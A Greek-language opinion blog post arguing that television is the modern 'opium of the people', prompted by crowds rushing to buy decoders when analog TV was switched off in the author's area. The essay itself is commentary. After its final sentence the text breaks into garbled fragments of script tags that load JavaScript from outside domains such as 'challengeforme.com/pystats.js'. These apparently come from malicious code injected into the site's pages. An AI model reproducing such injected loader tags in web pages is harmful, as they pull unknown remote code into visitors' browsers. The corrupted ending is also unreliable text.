Το σύγχρονο “όπιο” των λαών

television

Κάποτε ο Μάρξ είχε πει για τη Θρησκεία πως είναι το όπιο του λαού. Πολλοί είναι αυτοί που στη σύγχρονη εποχή λένε ότι όπιο είναι πχ το ποδόσφαιρο. Πιστεύω πως κανένα απ’ όλα αυτά δεν είναι τόσο δυνατό, τόσο εθιστικό όσο η τηλεόραση. Ναι αυτό, που πολλοί το χαρακτηρίζουν χαζοκούτι, φωνάζουν για χειραγωγούμενα και προπαγανδιστικά προγράμματα αλλά κανείς μα κανείς όμως δεν μπορεί να πατήσει το off και αν του την κόψουν θα αισθάνεται ότι του έκοψαν το οξυγόνο.

Γράφει ο Γιάννης Δραπανιώτης

Θα πει κανείς «φίλε τώρα τα ανακάλυψες αυτά;». Φυσικά και όχι πάντα γνωρίζαμε πιστεύω οι περισσότεροι, την τεράστια δύναμή της πάνω στην πλατιά μάζα. Τώρα όμως διαπίστωσα την ισχυρή εξάρτηση που δημιουργεί και το απόλυτο σύνδρομο στέρησης.

Αφορμή στάθηκε ένα απλό γεγονός. Αυτό είναι το προχθεσινό switch-off και η μετάβαση στο ψηφιακό σήμα στην περιοχή μου. Λίγο μετά τις 12.00 τα μεσάνυχτα οι αναλογικές συχνότητες έπαψαν να εκπέμπουν, όσοι ήξεραν να ρυθμίσουν τις τηλεοράσεις τους  ή είχαν αγοράσει αποκωδικοποιητή και ήξεραν να τον εγκαταστήσουν ok, όλοι οι υπόλοιποι, απ’ όλα αυτά που είδα όταν ξημέρωσε, μάλλον έκαναν ανήσυχο ύπνο.

Να αναφέρω εν’ τάχει, πως σε καφετέριες, καφενεία, τσιπουράδικα, πλατείες ήταν το πρώτο θέμα συζήτησης. Του περισσότερους ανθρώπους που άκουγες να μιλούν στα κινητά του ήταν να λένε να πάει κάποιος, φίλος, γνωστός ή τεχνικός σπίτι να «φτιάξει» την τηλεόραση. Οι ηλεκτρονικοί έκλειναν ραντεβού σε σπίτια ακόμη και μετά τα μεσάνυχτα, ενώ σε καταστήματα ηλεκτρικών ειδών, κάποιες ώρες είχαν δημιουργηθεί ουρές για την αγορά του …πολυπόθητου αποκωδικοποιητή. Σκηνές αλλοφροσύνης, που θα περίμενε κανείς να εκτυλίσσονται στα σουπερ μάρκετ αν οδεύαμε σε πόλεμο. Και όμως ήταν κάτι παραπάνω από πόλεμος, κάτι παραπάνω από θεομηνία …έπεσε το τηλεοπτικό σήμα !!!

Το ποίο επικίνδυνο ναρκωτικό, που μπορεί να μην σκοτώνει το σώμα, αλλά κάνει όμως κάτι εξίσου καταστροφικό, κατακαίει εντελώς το μυαλό, δεν κυκλοφορεί στις πιάτσες, δεν το διακινούν «βαποράκια» και είναι καθ’ όλα νόμιμο, το έχουμε όλοι μέσα στα σπίτια μας και μάλιστα σε πολλές δόσεις. Τηλεόραση στο σαλόνι, τηλεόραση στην κουζίνα, στην κρεβατοκάμαρα ίσως ακόμη και στην τουαλέτα.

Ένα ναρκωτικό, για το οποίο δεν γνωρίζω αν υπάρχει αποτοξίνωση και σίγουρα αν υπάρχει αυτή θα είναι πάρα πολύ δύσκολη. Ένα ναρκωτικό που το απολαμβάνεις από την άνεση του καναπέ και εξίσου άνετα το σύστημα καταφέρνει να σε υποβάλει σε mind control αβασάνιστα και να σε κάνει πειθήνιο όργανο που δεν θα αντιδρά σε τίποτα.

Αναρωτιόμαστε λοιπόν, γιατί με όσα συμβαίνουν σήμερα κανείς δεν αντιδρά. Ίσως γιατί κανείς μας δεν έχει ξεφύγει απ’ την επήρεια  αυτού του σύγχρονου οπίου των λαών που λέγεται τηλεόραση. Φυσικά αν θέλουμε να αλλάξουμε κάτι και να πάρουμε τις ζωές μας στα χέρια μας, πρέπει να ξεκινήσουμε το γρηγορότερο δυνατό αποτοξίνωση, όσο δύσκολο και αν μας φαίνεται αυτά!___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >